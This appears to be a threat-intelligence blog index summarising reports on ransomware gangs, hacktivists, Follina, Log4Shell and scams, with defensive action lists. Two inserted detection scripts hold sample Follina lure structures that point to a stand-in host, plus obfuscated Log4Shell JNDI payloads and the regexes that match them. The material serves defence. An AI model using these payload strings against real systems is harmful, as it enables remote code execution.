One year into the Russia-Ukraine war, cyber threats have evolved across state-sponsored operations, cybercrime, and hacktivism. Russian APT groups have targeted Ukrainian entities with espionage, wiper malware, and disinformation campaigns, while cybercriminals like LockBit have adapted tactics to avoid disruption and continue ransomware attacks. Hacktivist groups, including KillNet and the IT Army of Ukraine, have also emerged, launching DDoS attacks, website defacements, and data breaches in support of their respective sides. The convergence of these actors highlights a new era of cyber-enhanced conflict with broad implications.
Why it matters:
Geopolitically driven cyber activity creates unpredictable risks, threatening business operations, data security, and critical infrastructure even beyond conflict zones.
Immediate Actions:
-
Monitor geopolitical developments and associated cyber threats
-
Enhance defenses against DDoS, ransomware, and phishing campaigns
-
Audit systems for exposure to state-sponsored malware
-
Implement proactive threat intelligence and anomaly detection
-
Educate staff on emerging hacktivist tactics and social engineering risks
Read Full Report Here
Vulnerabilities in Q4 2022: The Flaws and Fervor of Exploitation
01/26/2023
In Q4 2022, more than 6,200 new vulnerabilities (CVEs) were disclosed, with memory corruption and privilege escalation the most common classes; remote code execution, denial of service, heap overflow, and information disclosure followed closely. Threat actors often chain lower-severity vulnerabilities to gain access and escalate privileges, which is why vulnerability management should be risk-based rather than driven by severity scores alone.
Highly discussed flaws included ProxyNotShell (CVE-2022-41040, CVE-2022-41082) and Fortinet FortiOS vulnerabilities (CVE-2022-40684, CVE-2022-42475), with proof-of-concept exploits widely shared on criminal forums. Attackers also exploited years-old vulnerabilities in exposed infrastructure, showing that unpatched legacy systems remain a major risk.
Key Takeaways:
Threat actors rapidly exploit newly disclosed CVEs, share PoC exploits, and actively target both new and old vulnerabilities. Privilege escalation and memory corruption vulnerabilities remain highly sought after due to their potential impact.
Immediate Actions:
-
Prioritize patching of critical and actively exploited vulnerabilities
-
Monitor threat actor chatter and PoC sharing in underground forums
-
Assess and secure exposed infrastructure and legacy systems
-
Implement risk-based vulnerability management rather than relying solely on CVSS scores
-
Leverage threat intelligence for actionable insights on emerging vulnerabilities
Read Full Report Here
What We're Reading This Month: July 2022
07/27/2022
This month, our reading roundup highlights major developments in
cybersecurity and threat intelligence
. Key topics include dark web research, data leakage, and emerging trends in DevSecOps. Digital Shadows’ Photon Research Team reports on recent campaigns targeting organizations’ digital assets, emphasizing the growing risks of brand impersonation, credential theft, and sensitive data exposure.
Notable insights:
-
Organizations are facing increasing threats from cybercriminals leveraging dark web forums to trade stolen data.
-
Data leakage incidents continue to rise, highlighting the need for proactive monitoring and rapid response.
-
DevSecOps practices are critical for integrating security into software development lifecycles, reducing vulnerabilities before deployment.
-
Brand protection remains essential as threat actors increasingly target reputational assets alongside technical exploits.
-
Awareness of emerging malware, ransomware, and phishing campaigns helps organizations anticipate and mitigate risks.
Immediate Actions:
-
Regularly monitor dark web sources for exposure of company credentials or sensitive information.
-
Ensure all development and production environments follow DevSecOps best practices.
-
Update incident response plans to address both technical and reputational threats.
-
Educate employees on recognizing phishing attempts and suspicious activity targeting corporate assets.
-
Conduct routine audits of digital assets to identify potential exposure points and misconfigurations.
Read Full Report Here
Ransomware in Q2 2022: Back in Business
07/11/2022
The second quarter of 2022 saw a resurgence of ransomware activity, reversing the slowdown from Q1. Notable events included the shutdown of the
Conti
ransomware gang, the rise of new groups, and LockBit’s release of its upgraded
LockBit 3.0
variant, introducing bug-bounty programs and new payment options via Zcash.
Key Takeaways:
-
Conti’s Closure:
Conti ceased operations following internal chat leaks, though some members likely dispersed into new ransomware groups. LockBit overtook Conti in total victims.
-
LockBit Activity:
LockBit accounted for nearly a third of all ransomware incidents in Q2, breaking records with 231 victims in a single quarter. The release of LockBit 3.0 could drive further activity in Q3 and beyond.
-
Emerging Groups:
New ransomware collectives like Black Basta, Mindware, Cheers, RansomHouse, Industrial Spy, Yanluowang, Onyx, NOKOYAWA, and DarkAngels appeared, while other groups shut down their data-leak sites.
-
Sector Targets:
Industrial Goods & Services led in attacks (18.4%), followed by Technology (8.7%), Construction & Materials (7.9%), Healthcare (6.4%), and Government (5.5%). Critical sectors faced the most significant increases.
-
Geographic Focus:
The United States remained the top target (38.9%), with Germany, the UK, Italy, Canada, and France also seeing increased ransomware activity.
Immediate Actions:
-
Monitor ransomware groups’ data-leak sites and emerging malware variants.
-
Implement sector-specific protections, especially for critical infrastructure like industrial, technology, and healthcare sectors.
-
Update incident response plans and ensure preparedness for double-extortion and data auction tactics.
-
Educate employees and stakeholders on phishing and ransomware threats.
-
Track ransomware trends with intelligence tools like SearchLight or GreyMatter to anticipate attacks and mitigate exposure.
Read Full Report Here
Killnet: The Hacktivist Group That Started A Global Cyber War
06/08/2022
Since the Russia-Ukraine conflict began, hacktivist activity has surged, with groups recruiting large numbers of participants to launch attacks.
Killnet
, a pro-Russia collective, has transformed from a DDoS tool provider into an organized cyber threat, targeting NATO members and Ukraine-supporting countries.
Their operations focus on government agencies and critical industries, using Layer 3/4 and Layer 7 DDoS attacks to disrupt services.
Killnet leverages Telegram to coordinate attacks, recruit volunteers, and share target lists, amplifying the scale of its campaigns.
Why it matters:
Killnet’s coordinated cyber assaults pose operational and financial risks for organizations in targeted countries, potentially crippling essential services and critical infrastructure.
Immediate Actions:
-
Implement and regularly update anti-DDoS protections
-
Monitor public channels for threat announcements and target lists
-
Block known malicious IPs associated with Killnet
-
Review incident response plans for prolonged service disruptions
-
Educate staff on recognizing early indicators of DDoS activity
Read Full Report Here
Attackers seize Microsoft zero-day for malware dissemination, espionage
06/17/2022
A critical Microsoft zero-day vulnerability, known as Follina (CVE-2022-30190), is being actively exploited by both nation-state and cybercriminal groups.
The flaw allows remote code execution when users open or preview Office documents, even with macros disabled: the document loads a remote HTML template that invokes the Microsoft Support Diagnostic Tool (MSDT) through the ms-msdt: URL protocol.
Threat actors, including PRC-aligned groups and QakBot affiliates, have leveraged Follina for phishing campaigns targeting government and enterprise systems in multiple countries.
Despite a patch released in June 2022, unpatched systems remain vulnerable, making this a high-risk attack vector for malware, trojans, and potential ransomware deployment.
Why it matters:
Follina enables attackers to compromise systems with minimal user interaction, posing significant operational, financial, and data-security risks for organizations worldwide.
Immediate Actions:
-
Apply Microsoft’s June 2022 patch immediately or, until it can be applied, implement the MSDT URL protocol workaround from Microsoft’s guidance (back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key)
-
Scan for and block malicious attachments in emails
-
Train staff to identify suspicious emails and phishing attempts
-
Monitor for indicators of compromise linked to Follina exploitation
-
Review endpoint security configurations to mitigate remote code execution risks
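The attachment scanning recommended above needs to look past macros. As an added example (not code from the original report or from Microsoft), the Python below flags Office documents built the way the Follina lures were, and the second-stage page they fetch: a Word OLE relationship whose target is an external URL, and an HTML page that hands off to the ms-msdt: protocol. The .docx and the HTML are constructed in memory; payload.example is a placeholder host, not a real indicator.

```python
"""Added example (not code from the original report): flag Office documents
built the way Follina (CVE-2022-30190) lures were, and the second-stage page
they fetch.

A legitimately embedded OLE object is an internal package part; Follina
documents declare TargetMode="External" with an http(s) target so Word
retrieves attacker HTML, which then redirects to the ms-msdt: URL protocol.
The .docx and HTML below are constructed in memory; payload.example is a
placeholder host, not a real indicator.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml for attacker-controlled documents

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)


def suspicious_relationships(docx_bytes: bytes):
    """Return [(rels_part, target)] for OLE relationships that point outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for name in package.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                is_external = rel.get("TargetMode", "Internal").lower() == "external"
                is_remote = target.lower().startswith(("http://", "https://"))
                if rel.get("Type") == OLE_TYPE and is_external and is_remote:
                    findings.append((name, target))
    return findings


def html_invokes_msdt(html: str) -> bool:
    """Second stage: does the fetched page hand off to the ms-msdt: protocol handler?"""
    return MSDT_RE.search(html) is not None


def build_docx(rels_xml: str) -> bytes:
    """Minimal .docx (a ZIP of XML parts) carrying the given document relationships."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed samples. The trailing "!" on the external target mirrors how the
# original lure was written; the check does not depend on it.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="http://payload.example/stage.html!" TargetMode="External"/>
</Relationships>"""

# An embedded OLE object and an ordinary external hyperlink: neither should fire.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intranet.example/" TargetMode="External"/>
</Relationships>"""

# Constructed second stage: the redirect to the diagnostic tool is the tell.
STAGE_HTML = """<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic ...";
</script></body></html>"""

if __name__ == "__main__":
    for part, target in suspicious_relationships(build_docx(MALICIOUS_RELS)):
        print(f"{part}: external OLE target {target}")
    print("stage page invokes MSDT:", html_invokes_msdt(STAGE_HTML))
```

To run it over real mail attachments, pass the file contents to suspicious_relationships; it stays quiet on internal OLE embeddings and on plain hyperlinks, so it targets the delivery pattern rather than every document with an external link.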
Read Full Report Here
Killnet hacktivists declare cyber war on 10 countries
05/20/2022
The pro-Russia hacktivist group
Killnet
has declared “war” on ten countries—including the US, UK, Germany, Italy, and Ukraine—threatening widespread DDoS attacks.
Originating as a purchasable DDoS tool, Killnet has evolved into a politically motivated hacktivist group, recruiting volunteers and targeting critical infrastructure such as government, financial, and transportation sectors.
The group’s activities have included attacks on websites in Poland, Germany, Italy, Romania, and Ukraine, with campaigns announced and coordinated through Telegram.
Killnet’s attacks are largely unsophisticated, focusing on service disruption rather than data theft or destruction, but pose a credible risk to organizations reliant on online operations.
Why it matters:
Killnet’s growing membership and high visibility in Russian social channels suggest an increase in disruptive DDoS activity, which could impact critical services and economies in targeted countries.
Immediate Actions:
-
Ensure DDoS mitigation solutions are active and up-to-date for critical systems
-
Monitor networks for unusual traffic spikes indicating potential attacks
-
Educate staff about social engineering attempts and threat actor propaganda
-
Coordinate with national CERTs and relevant authorities for situational awareness
-
Review incident response plans to handle potential service outages
Read Full Report Here
ALPHV: The First Rust-Based Ransomware
05/06/2022
The ransomware group
ALPHV
(aka BlackCat) has emerged as the first Rust-based ransomware, operating as a ransomware-as-a-service (RaaS) platform. ALPHV uses a double-extortion model, encrypting victims’ systems while threatening to publish stolen data on its leak site. Since late 2021, the group has posted nearly 100 victims and remains highly active. Its affiliate program recruits skilled actors, offering tiered payouts from 80% to 90% depending on ransom amounts, while prohibiting attacks in CIS countries, China, Taiwan, Hong Kong, and Turkey.
Why it matters:
ALPHV’s Rust-based ransomware enhances performance and evasion, differentiating it from other malware. Affiliates gain access through compromised credentials or exploited vulnerabilities, often using tools like PowerShell, Cobalt Strike, and Windows admin tools. The group conducts careful reconnaissance, exfiltrates sensitive data, and customizes ransom notes for each victim.
Immediate Actions:
-
Monitor for signs of ALPHV activity, including unusual PowerShell execution or admin tool usage
-
Audit and secure Active Directory accounts to prevent privilege escalation
-
Apply strong endpoint and network defenses, including threat-hunting for Cobalt Strike activity
-
Educate staff on phishing and credential-compromise risks
-
Maintain up-to-date backups and validate incident response plans for ransomware events
Read Full Report Here
Karakurt Hacking Team moonlights as Conti side business
04/22/2022
The
Karakurt Hacking Team
has been linked to the notorious
Conti
ransomware gang, likely operating as a “side business” to handle data extortion when Conti’s encryption fails. Security researchers discovered connections between Conti infrastructure and Karakurt servers, revealing that Conti sometimes uploads stolen data to Karakurt’s leak site. Karakurt does not encrypt data but exfiltrates and exposes it, and has re-extorted victims that previously paid Conti. The relationship suggests that organizations hit by Conti remain at risk of follow-on attacks from Karakurt.
Why it matters:
Karakurt specializes in data exfiltration and single-extortion, complementing Conti’s double-extortion model. The group uses tools such as Ligolo-ng, Metasploit, Impacket, and Danted to gain initial access, move laterally, and maintain persistence. Conti, Ryuk, and Karakurt together form a ransomware ecosystem covering encryption, exfiltration, and secondary extortion, making attacks more comprehensive and harder to mitigate.
Immediate Actions:
-
Patch systems and maintain updated anti-virus software
-
Implement multi-factor authentication on all corporate accounts
-
Disable external RDP access and ensure proper network segmentation
-
Monitor network activity for unusual lateral movement or reverse tunnels
-
Validate incident response and backup strategies to handle ransomware and data extortion events
Read Full Report Here
Q1 2022 Ransomware Roundup
04/12/2022
In Q1 2022, ransomware activity remained significant but declined compared to Q4 2021, with 582 organizations named on ransomware data-leak sites—a 25.3% decrease. LockBit 2.0 and Conti were the most active gangs, responsible for 57.8% of all incidents. The Industrial Goods & Services sector was the most targeted (20.1%), followed by Financial Services, Construction & Materials, Technology, and Government. Geographically, the United States remained the primary target (38.5%), with the UK, Germany, Italy, and France following.
Key Trends:
The Russia-Ukraine war influenced ransomware groups’ allegiances, with Conti and STORMOUS supporting Russia, while LockBit 2.0 remained apolitical. New extortion-style groups such as Lapsus$ emerged, claiming ransomware attacks without evidence of encryption, highlighting the rise of extortion-only tactics. A shift in targeting toward mid-sized organizations was observed, as these groups diversify their attacks to avoid law enforcement scrutiny.
Immediate Actions:
-
Continue monitoring ransomware activity and emerging groups
-
Ensure robust patching and anti-virus measures
-
Implement multi-factor authentication across all accounts
-
Restrict and monitor RDP access and network segmentation
-
Validate backups and incident response plans for ransomware and extortion scenarios
Read Full Report Here
Maverick extortionist group Lapsus$ goes after big tech
03/25/2022
The Lapsus$ cyber-extortion group has recently targeted major technology companies, including Microsoft, Nvidia, Samsung, LG Electronics, and Okta, stealing source code, proprietary data, and cryptocurrency. Unlike typical ransomware actors, Lapsus$ openly publishes stolen data on Telegram and engages followers in deciding future targets. The group uses social engineering, insider recruitment, and account compromise rather than malware to gain access. Its high-profile attacks and bold tactics make these campaigns particularly relevant for organizations relying on intellectual property and cloud services.
Why it matters:
Breaches of source code and sensitive data can expose security vulnerabilities, result in financial loss, and damage reputations, while enabling further targeted attacks on customers and partners.
Immediate Actions:
-
Review and strengthen multi-factor authentication, avoiding SMS or voice-based MFA
-
Monitor employee account activity for suspicious logins and password resets
-
Audit Okta and other identity management logs for anomalies
-
Educate staff on social engineering and help-desk verification protocols
-
Limit access to sensitive source code and critical systems
Read Full Report Here
Cybercriminals React to Ukraine-Russia Conflict
02/25/2022
Following Russia’s invasion of Ukraine, cybercriminal groups have been actively positioning themselves around the conflict. Notably, the Conti ransomware group and CoomingProject pledged support for Russia in case of cyber retaliation, highlighting their potential to target critical infrastructure and exfiltrate sensitive data. Cybercriminal forums, both English- and Russian-language, have been abuzz with discussions on DDoS attacks, data theft, and predictions about the conflict, reflecting a mix of opportunism, political opinion, and strategic planning. These developments signal increased risk for organizations in conflict-adjacent regions and those reliant on global digital infrastructure.
Why it matters:
Geopolitical conflicts can catalyze cybercrime activity, increasing exposure to ransomware, data leaks, and infrastructure disruption for businesses worldwide.
Immediate Actions:
-
Review and reinforce defenses for critical infrastructure and key services
-
Monitor for unusual network activity and threat intelligence reports linked to conflict zones
-
Strengthen multi-factor authentication and incident response protocols
-
Educate staff on phishing and social engineering campaigns exploiting geopolitical events
-
Coordinate with external partners and vendors on cyber risk awareness
Read Full Report Here
FBI warns public about fake QR codes scamming scanners
01/28/2022
The FBI has issued a warning regarding a surge in malicious QR code scams, following reports of cybercriminals overlaying legitimate QR codes with fraudulent ones at parking stations across the US. Scanning these codes can redirect users to phishing sites, download malware, or compromise payment information. Such attacks exploit the public’s trust in QR codes and the growing use of contactless payments, making them particularly effective. While primarily executed by unsophisticated actors due to the need for physical placement, digital QR code scams may also rise. Users are advised to verify codes before scanning, ensure websites are legitimate, and maintain anti-malware protections.
Why it matters:
QR code scams can compromise payments, credentials, and device security, increasing risk for everyday transactions and mobile-device users.
Immediate Actions:
-
Verify QR codes before scanning, especially in public locations
-
Use anti-malware software on all mobile devices
-
Monitor accounts for unusual activity after using QR codes
-
Educate staff and the public on the risks of QR code scams
-
Report suspicious QR codes to relevant authorities
Read Full Report Here
Ransomware Q4 Overview
01/19/2022
Q4 2021 saw continued ransomware growth, with 781 victims named on data-leakage sites—a 36.8% increase from the previous quarter. LockBit 2.0 remained the most active group, while Conti, PYSA, and AvosLocker also increased activity. Ransomware groups exploited new vulnerabilities, including Log4Shell (CVE-2021-44228) and Confluence (CVE-2021-26084), emphasizing the need for rapid patching. The RAMP forum became a hub for ransomware collaboration, and single-extortion attacks by groups like FIN12 minimized attack time. Key targeted sectors included Industrial Goods & Services, Construction & Materials, and Technology, with the US, UK, and Germany most affected. Insider threats and professionalization of ransomware operations are expected to continue into 2022.
Why it matters:
Ransomware continues to evolve rapidly, exploiting new vulnerabilities and collaborating via forums, posing a significant threat across sectors and geographies.
Immediate Actions:
-
Maintain timely patching and vulnerability management
-
Monitor data-leak sites for potential exposure
-
Educate employees on insider threat risks and ransomware tactics
-
Implement advanced endpoint detection and response (EDR) solutions
-
Conduct regular backups and test recovery procedures
Read Full Report Here
The Log4j Zero-Day: What We Know So Far
12/10/2021
On December 10, 2021, a critical zero-day vulnerability, CVE-2021-44228 (“Log4Shell”), was disclosed in the widely used Apache Log4j 2 Java logging library. The flaw allows unauthenticated remote code execution (RCE) wherever attacker-controlled input reaches a log statement, affecting systems using Apache Struts, Solr, Druid, and other Log4j-dependent applications, including popular services like Minecraft. Threat actors began scanning for and exploiting vulnerable systems almost immediately after proof-of-concept code became public.
Why it matters:
The vulnerability is easy to exploit and has a broad attack surface, potentially compromising sensitive data and critical systems across industries.
Immediate Actions:
-
Upgrade to Log4j version 2.15 or later; if not possible, set log4j2.formatMsgNoLookups to true or remove the JndiLookup class from the log4j-core jar (2.15.0 and the formatMsgNoLookups setting were later found to be incomplete mitigations, tracked as CVE-2021-45046, so upgrade to the current release)
-
Assess logs for indicators of compromise (e.g., jndi:ldap and obfuscated variants such as ${lower:j}ndi or ${::-j}ndi)
-
Identify application fields parsed by Log4j that could be manipulated by attackers
-
Engage key suppliers to confirm exposure and remediation plans
-
Capture lessons learned to improve incident response and logging processes
-
Leverage threat intelligence feeds, forums, and vulnerability data for monitoring
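The log review above is only as good as its handling of obfuscation: most real probes hide the jndi keyword behind nested lookups and URL encoding. As an added example (not code from the original report or from the Log4j project), the Python below normalizes those wrappers before matching, so the same check catches the plain, case-wrapped, default-value-wrapped, and URL-encoded forms. The log lines are constructed for the example and use RFC 5737 documentation addresses, not real indicators.

```python
"""Added example (not code from the original report): find Log4Shell
(CVE-2021-44228) probes in web server logs, including the obfuscated forms
that a plain grep for "jndi:ldap" misses.

The log lines below are constructed; the IPs are from the RFC 5737
documentation ranges and are not real indicators.
"""
import re
from urllib.parse import unquote

# Log4j lookups attackers wrap around the payload so the literal string "jndi"
# never appears in the raw request. Each one expands to its inner text:
#   ${lower:J} / ${upper:j}  -> j
#   ${::-j}, ${env:NOPE:-j}  -> j   (":-" is Log4j's default-value syntax)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# What is left once the wrappers are gone: a JNDI lookup with a remote scheme.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\b", re.IGNORECASE
)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and peel nested case/default-value lookups, innermost first."""
    s = unquote(unquote(s))  # second pass catches double-encoded payloads (%2524 -> %24 -> $)
    for _ in range(max_rounds):
        expanded = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        expanded = _DEFAULT_VALUE.sub(lambda m: m.group(1), expanded)
        if expanded == s:
            break
        s = expanded
    return s.lower()


def find_jndi_iocs(lines):
    """Return (line_number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1)))
    return hits


# Constructed sample: four probes in increasing levels of obfuscation, then two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/b}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.5 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${${env:NaN:-j}ndi:${upper:L}dap://198.51.100.7/d} HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.20 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-ldap-tutorial.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Dec/2021:12:00:06 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme in find_jndi_iocs(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Run it over the request URI, User-Agent, Referer and any other logged header, since all of them reach log statements. The class-removal mitigation named above is the command Apache documented for jars that cannot be upgraded: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.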
Read Full Report Here
Call it a comeback: Cybercriminals delight in return of Emotet
11/26/2021
Emotet has resurfaced after a major law enforcement takedown earlier in 2021, signaling a renewed threat to organizations worldwide. The malware is being distributed through malicious Microsoft Office and ZIP files, leveraging the TrickBot botnet to rebuild its infrastructure. Historically used as an initial access broker for ransomware groups such as Conti and Ryuk, Emotet enables attackers to establish backdoors and sell access to compromised networks. Early activity shows updated encryption and HTTPS communications, indicating operational improvements and preparation for broader campaigns.
Why it matters:
Emotet has long served as a gateway for large-scale ransomware attacks, and its return increases the risk of phishing-driven compromises that can quickly escalate into enterprise-wide incidents.
Immediate Actions:
- Block malicious email attachments and enforce advanced spam filtering
- Disable or restrict Microsoft Office macros across the enterprise
- Enable multi-factor authentication for remote and privileged access
- Monitor for suspicious outbound HTTPS traffic and command-and-control patterns
- Conduct phishing awareness training and streamline reporting processes
Read Full Report Here
Ransomware Q3 Roll Up
10/25/2021
Ransomware activity remained one of the most disruptive cyber threats in Q3 2021, highlighted by REvil’s supply-chain attack on Kaseya, which reportedly impacted up to one million downstream users. The quarter also saw the rise of LockBit 2.0 as the most active group, surpassing Conti, alongside continued double-extortion tactics and expansion of data-leak sites. Despite law enforcement pressure and forum bans, ransomware groups rebranded, resurfaced, and launched new platforms like RAMP to sustain operations. North America—particularly the United States—remained the primary target, with industrial goods, technology, and construction sectors heavily affected.
Why it matters:
Ransomware groups are adapting through rebranding, supply-chain targeting, and faster attack timelines, increasing the likelihood of large-scale business disruption and third-party risk exposure.
Immediate Actions:
- Assess and monitor third-party and MSP access to critical systems
- Implement network segmentation to limit lateral movement
- Harden backup strategies and regularly test restoration procedures
- Monitor for data exfiltration and dark web exposure indicators
- Review incident response plans for rapid containment scenarios
Read Full Report Here
Single extortion shines in rapid FIN12 ransomware attacks
10/15/2021
The FIN12 threat group is drawing attention for deploying ransomware significantly faster than most competitors, often encrypting systems in under three days. Unlike many ransomware operators, FIN12 primarily uses single-extortion tactics, focusing on rapid encryption rather than data theft and leak sites. The group frequently deploys Ryuk and Conti ransomware, leveraging phishing and compromised remote access environments for initial entry. Healthcare organizations—especially in North America—remain a primary target, increasing the likelihood of ransom payments due to the operational and life-safety risks of system downtime.
Why it matters:
FIN12’s speed and focus on sensitive sectors like healthcare reduce detection windows and increase the probability of business disruption before defenders can respond.
Immediate Actions:
- Harden and monitor remote access services such as VPN and Citrix
- Implement rapid detection for lateral movement and privilege escalation
- Deploy endpoint detection and response (EDR) across critical systems
- Segment healthcare and other mission-critical networks
- Test incident response plans for sub-72-hour ransomware scenarios
Read Full Report Here
Cybersecurity Awareness Month: Week 1 – Managing Your Digital Shadow
10/05/2021
Cybersecurity Awareness Month highlights the importance of managing your “digital shadow”—the exposed personal data that accumulates through social media, online accounts, data breaches, and public records. This information can include email addresses, phone numbers, family details, and employment history, all of which can be leveraged by threat actors during reconnaissance. Attackers frequently use open-source intelligence and social engineering to exploit exposed credentials, impersonate employees, or bypass account recovery controls. As digital footprints expand over time, unmanaged exposure increases both personal and organizational risk.
Why it matters:
Excessive digital exposure enables targeted phishing, credential stuffing, and account takeover attacks that can lead to corporate compromise.
Immediate Actions:
- Audit your online presence using basic OSINT searches
- Change passwords for accounts exposed in data breaches
- Enable multi-factor authentication on personal and work accounts
- Restrict social media privacy settings and limit public details
- Remove personal data from public people-search websites where possible
Read Full Report Here
The Eeveelution of ShinyHunters: From Data Leaks to Extortions
08/26/2021
ShinyHunters, a financially motivated cybercriminal group first known for selling and leaking massive datasets, has resurfaced with a shift toward direct extortion. After previously dumping stolen records from companies across technology, education, and media, the group is now auctioning allegedly stolen data — including a claimed 70 million-record dataset tied to AT&T. This marks a strategic evolution from data sales and free leaks to ransomware-style monetization. The move signals a broader trend of data theft actors adopting high-pressure extortion tactics to increase profits.
Why it matters:
Data leak groups are evolving into full-scale extortion actors, increasing financial, legal, and reputational risk for organizations — even when breach claims remain unverified.
Immediate Actions:
- Monitor dark web forums for brand and data exposure
- Validate and segment sensitive data repositories
- Strengthen detection of data exfiltration activity
- Prepare executive response plans for public breach claims
- Review legal and regulatory notification requirements
Read Full Report Here
The Facebook Data Leak Explained
04/08/2021
In April 2021, data from 533 million Facebook users resurfaced on cybercriminal forums after initially being scraped in 2019. Threat actors abused Facebook’s contact importer feature to harvest phone numbers — including those set to private — alongside public profile data such as names, locations, and employment details. The dataset circulated for sale before being released widely for free, dramatically increasing accessibility to criminals. Although no passwords were exposed, the scale and global reach of the leak make it highly operational for fraud and social engineering.
Why it matters:
Large-scale data aggregation enables targeted phishing, vishing, SIM-swapping, and impersonation attacks — particularly against executives and high-profile individuals.
Immediate Actions:
- Assess executive and employee exposure in known data leaks
- Increase monitoring for phishing and vishing campaigns
- Enforce MFA across corporate and personal accounts
- Educate staff on social engineering risks tied to exposed PII
- Review privacy settings and limit publicly accessible data
Read Full Report Here
Clickbait to Checkmate: SMS-Based Scam Targets U.S. Smartphones and Accesses Victim Locations
10/13/2020
A large-scale SMS phishing campaign dubbed the “USPS texting scam” is targeting U.S. smartphone users with spoofed delivery notifications impersonating brands like USPS, Amazon, and FedEx. Victims who click the link are routed through a fingerprinting chain that collects device, IP, and location data before being redirected to personalized phishing pages requesting PII and payment card details. The infrastructure is short-lived, geo-targeted to U.S. IP addresses, and designed to evade analysis. Beyond credit card theft, the campaign may enable future spearphishing, push-notification abuse, or broader fraud operations.
Why it matters:
Personalized, location-aware smishing increases success rates and creates reusable intelligence for follow-on fraud, impersonation, and disinformation campaigns.
Immediate Actions:
- Block and report unsolicited SMS links at the carrier level
- Educate users on smishing indicators and brand impersonation
- Implement mobile threat defense and DNS filtering
- Monitor for spoofed brand domains and phishing kits
- Enforce MFA to limit credential reuse risk
Read Full Report Here
Recent Arrests and High-Profile Convictions: What Does It Mean for the Cyber Threat Landscape?
09/30/2020
Recent law enforcement actions — including the sentencing of a member of The Dark Overlord, 179 arrests tied to Europol’s Operation DisrupTor, and U.S. charges against members of APT41 — signal increased global pressure on cybercriminal and nation-state actors. Authorities disrupted major dark web marketplaces, seized illicit funds, and exposed operators previously considered untouchable. While these actions demonstrate growing investigative capability and international coordination, history shows criminal ecosystems quickly regenerate. Threat actors are likely to adapt, improve operational security, and continue financially motivated and state-sponsored campaigns.
Why it matters:
Arrests and indictments raise the cost of cybercrime but rarely eliminate it — instead driving adversaries to evolve tactics, infrastructure, and anonymity measures.
Immediate Actions:
- Monitor shifts in threat actor TTPs following major takedowns
- Track emerging dark web marketplaces and successor platforms
- Assess exposure to ransomware and extortion groups
- Strengthen attribution-aware threat intelligence collection
- Prepare for adaptive adversary OPSEC improvements
Read Full Report Here
A New Decade of Cyber Threats: Looking Back at The Trending Cyber Topics of Q1 2020
05/14/2020
Q1 2020 saw a surge in cyber threats linked to global events, including geopolitical tensions and the COVID-19 pandemic. Threat actors exploited the assassination of Soleimani with defacement campaigns and targeted campaigns by APT34. Scammers leveraged social distancing fears, promoting fake PPE, cures, and malicious mobile apps. Dark web activity increased via marketplaces like Apollon and search tools like Kilos, highlighting growing opportunities for cybercrime.
Why it matters:
These threats demonstrate how crisis-driven events amplify attack surfaces, targeting both individuals and organizations with high potential financial and reputational impact.
Immediate Actions:
- Monitor for phishing campaigns and malicious apps linked to trending events
- Harden web and email defenses against defacement and spoofing attacks
- Audit dark web exposure and marketplace mentions of your organization
- Educate staff and users on fake cures, PPE scams, and mobile app risks
- Enforce multi-factor authentication and timely patching of critical systems
Read Full Report Here
REvil ransomware gang vanishes without a trace
07/23/2021
